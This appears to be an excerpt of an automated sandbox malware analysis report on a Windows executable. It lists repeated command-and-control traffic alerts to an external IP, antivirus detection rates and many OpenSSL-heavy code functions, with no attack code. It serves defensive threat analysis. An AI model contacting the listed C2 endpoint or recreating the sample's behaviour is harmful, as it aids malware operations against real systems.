                                2025-02-22T02:34:27.940547+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:28.048619+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:28.158188+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:28.267358+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:28.378580+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:28.486569+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:28.596562+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:28.705131+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:28.814307+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:28.923618+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:29.033063+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:29.142329+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:29.251816+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:29.361173+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:29.470512+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:29.579882+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:29.692651+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:29.798592+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:29.908550+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:30.019568+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:30.126764+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:30.236551+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:30.345490+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:30.456644+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:30.564296+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:30.673603+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:30.783154+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:30.892425+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:31.001739+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:31.111081+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:31.220535+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:31.329868+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:31.439259+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:31.548586+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:31.659369+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:31.767341+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:31.876717+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:31.986097+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:32.095674+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:32.204851+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:32.314269+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:32.427147+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:32.532986+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:32.642468+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:32.751817+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:32.861179+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:32.970502+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:33.079981+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:33.189216+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:33.298824+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:33.407995+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:33.517420+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:33.628590+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:33.736579+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:33.848569+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:33.956568+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:34.064557+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:34.173670+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:34.284578+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:34.392558+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:34.503789+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:34.611115+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:34.720494+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:34.829969+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:34.939248+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:35.048747+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:35.158079+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:35.267393+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:35.376780+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:35.486113+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:35.595528+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:35.708562+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:35.816610+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:35.924570+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:36.033036+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:36.143691+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:36.252558+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:36.363567+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:36.474848+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:36.580577+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:36.689329+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:36.798647+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:36.908097+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP
                                2025-02-22T02:34:37.017430+010028277451Malware Command and Control Activity Detected192.168.2.44973364.190.113.1591488TCP

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Multi AV Scanner detection for submitted file
                                Source: BUenB12U2a.exeReversingLabs: Detection: 34%
                                Source: BUenB12U2a.exeVirustotal: Detection: 38%Perma Link
                                Joe Sandbox ML detected suspicious sample
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0077CB40 CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,EVP_MD_get0_provider,EVP_MD_free,EVP_MD_get0_provider,EVP_MD_free,EVP_CIPHER_get0_provider,EVP_CIPHER_free,EVP_MD_get0_provider,EVP_MD_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_free,1_2_00007FFE0077CB40
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007AE0C1 CRYPTO_free,CRYPTO_free,1_2_00007FFE007AE0C1
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007624C8 CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,memcpy,1_2_00007FFE007624C8
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007626DF BIO_s_file,BIO_new,ERR_new,ERR_set_debug,BIO_ctrl,ERR_new,ERR_set_debug,strncmp,ERR_new,ERR_set_debug,strncmp,CRYPTO_realloc,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,PEM_read_bio,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_free,1_2_00007FFE007626DF
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761140 CRYPTO_free,1_2_00007FFE00761140
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007C4110 ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,1_2_00007FFE007C4110
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007AE040 CRYPTO_free,1_2_00007FFE007AE040
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761AB4 CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,1_2_00007FFE00761AB4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761893 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_strdup,ERR_new,ERR_set_debug,1_2_00007FFE00761893
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007B80A0 CRYPTO_free,CRYPTO_memdup,1_2_00007FFE007B80A0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007821C0 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_THREAD_lock_new,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_dup,X509_VERIFY_PARAM_new,X509_VERIFY_PARAM_inherit,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_malloc,memcpy,CRYPTO_new_ex_data,1_2_00007FFE007821C0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007721F0 CRYPTO_THREAD_run_once,1_2_00007FFE007721F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007AE200 CRYPTO_free,1_2_00007FFE007AE200
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0077E227 CRYPTO_THREAD_write_lock,1_2_00007FFE0077E227
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761389 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFE00761389
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007A4230 CRYPTO_malloc,memset,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,1_2_00007FFE007A4230
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007A2230 ERR_new,ERR_set_debug,BN_num_bits,CRYPTO_malloc,ERR_new,ERR_set_debug,BN_bn2bin,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,CRYPTO_clear_free,ERR_new,ERR_set_debug,BN_clear_free,BN_clear_free,BN_clear_free,1_2_00007FFE007A2230
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00762180 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,1_2_00007FFE00762180
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007DA2C0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,EVP_PKEY_CTX_set_rsa_padding,OSSL_PARAM_construct_uint,OSSL_PARAM_construct_end,EVP_PKEY_CTX_set_params,EVP_PKEY_decrypt,OPENSSL_cleanse,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_CTX_free,1_2_00007FFE007DA2C0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007D22F0 CRYPTO_free,CRYPTO_memdup,1_2_00007FFE007D22F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00764300 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFE00764300
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007623D8 EVP_MD_get_size,EVP_CIPHER_get_iv_length,EVP_CIPHER_get_key_length,CRYPTO_clear_free,CRYPTO_malloc,ERR_new,ERR_set_debug,1_2_00007FFE007623D8
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076198D CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,1_2_00007FFE0076198D
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007AE260 CRYPTO_free,1_2_00007FFE007AE260
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761401 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,1_2_00007FFE00761401
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761B54 memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,memcmp,EVP_CIPHER_CTX_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcmp,memcpy,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,1_2_00007FFE00761B54
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076139D memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,1_2_00007FFE0076139D
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007B8350 CRYPTO_free,CRYPTO_strndup,1_2_00007FFE007B8350
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00780380 X509_VERIFY_PARAM_free,CRYPTO_free_ex_data,BIO_pop,BIO_free,BIO_free_all,BIO_free_all,BUF_MEM_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,SCT_LIST_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,ASYNC_WAIT_CTX_free,CRYPTO_free,OPENSSL_sk_free,CRYPTO_THREAD_lock_free,CRYPTO_free,1_2_00007FFE00780380
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007743A0 OPENSSL_sk_num,X509_STORE_CTX_new_ex,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,X509_STORE_CTX_init,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,X509_STORE_CTX_set_flags,CRYPTO_THREAD_run_once,X509_STORE_CTX_set_ex_data,OPENSSL_sk_num,X509_STORE_CTX_set0_dane,X509_STORE_CTX_set_default,X509_VERIFY_PARAM_set1,X509_STORE_CTX_set_verify_cb,X509_verify_cert,X509_STORE_CTX_get_error,OPENSSL_sk_pop_free,X509_STORE_CTX_get0_chain,X509_STORE_CTX_get1_chain,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_move_peername,X509_STORE_CTX_free,1_2_00007FFE007743A0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007625EF CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,memcpy,memcmp,memcmp,memcmp,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_clear_free,1_2_00007FFE007625EF
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761F23 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,1_2_00007FFE00761F23
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007D2510 CRYPTO_free,CRYPTO_strndup,1_2_00007FFE007D2510
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761492 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,1_2_00007FFE00761492
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761A0F ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_CIPHER_get_flags,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_get0_md,EVP_MD_get_size,CRYPTO_memcmp,ERR_set_mark,ERR_clear_last_mark,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_pop_to_mark,ERR_clear_last_mark,ERR_new,ERR_set_debug,EVP_MD_CTX_get0_md,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,strncmp,strncmp,strncmp,strncmp,strncmp,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,1_2_00007FFE00761A0F
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007618B6 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFE007618B6
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007684B0 CRYPTO_zalloc,CRYPTO_free,1_2_00007FFE007684B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007A25D0 SRP_Calc_u_ex,BN_num_bits,CRYPTO_malloc,ERR_new,ERR_set_debug,BN_bn2bin,BN_clear_free,BN_clear_free,1_2_00007FFE007A25D0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0078E5E0 CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,1_2_00007FFE0078E5E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0077A600 CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,1_2_00007FFE0077A600
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076120D EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,CRYPTO_clear_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memset,1_2_00007FFE0076120D
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007A8620 CRYPTO_free,1_2_00007FFE007A8620
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761212 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,1_2_00007FFE00761212
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076114F CRYPTO_free,ERR_new,ERR_set_debug,1_2_00007FFE0076114F
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007AE540 CRYPTO_free,1_2_00007FFE007AE540
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007C4540 BN_num_bits,BN_bn2bin,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFE007C4540
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761488 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFE00761488
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007AE5A0 CRYPTO_free,1_2_00007FFE007AE5A0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007626AD ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,1_2_00007FFE007626AD
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007614CE CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,1_2_00007FFE007614CE
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007A86D0 OPENSSL_cleanse,CRYPTO_free,1_2_00007FFE007A86D0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007C66E0 CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,1_2_00007FFE007C66E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007D26E0 CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_fetch,EVP_CIPHER_get_iv_length,RAND_bytes_ex,EVP_CIPHER_free,EVP_EncryptUpdate,EVP_EncryptFinal,ERR_new,ERR_new,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get_iv_length,ERR_new,ERR_new,CRYPTO_free,EVP_CIPHER_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_CIPHER_CTX_free,1_2_00007FFE007D26E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007C0700 ERR_new,ERR_set_debug,CRYPTO_clear_free,1_2_00007FFE007C0700
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761CA3 CRYPTO_strdup,CRYPTO_free,1_2_00007FFE00761CA3
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007617E9 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,memcmp,ERR_new,CRYPTO_memdup,ERR_new,ERR_new,ERR_set_debug,1_2_00007FFE007617E9
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076241E CRYPTO_zalloc,CRYPTO_zalloc,OBJ_nid2sn,EVP_get_digestbyname,OBJ_nid2sn,EVP_get_digestbyname,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFE0076241E
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007617DF ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,1_2_00007FFE007617DF
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007747F0 i2d_X509_NAME,i2d_X509_NAME,memcmp,CRYPTO_free,CRYPTO_free,1_2_00007FFE007747F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007D4809 CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFE007D4809
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE0076136B ERR_new,ERR_set_debug,CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,ERR_new,ERR_set_debug,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,1_2_00007FFE0076136B
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE007A8810 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,1_2_00007FFE007A8810
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFE00761771 CRYPTO_free,1_2_00007FFE00761771
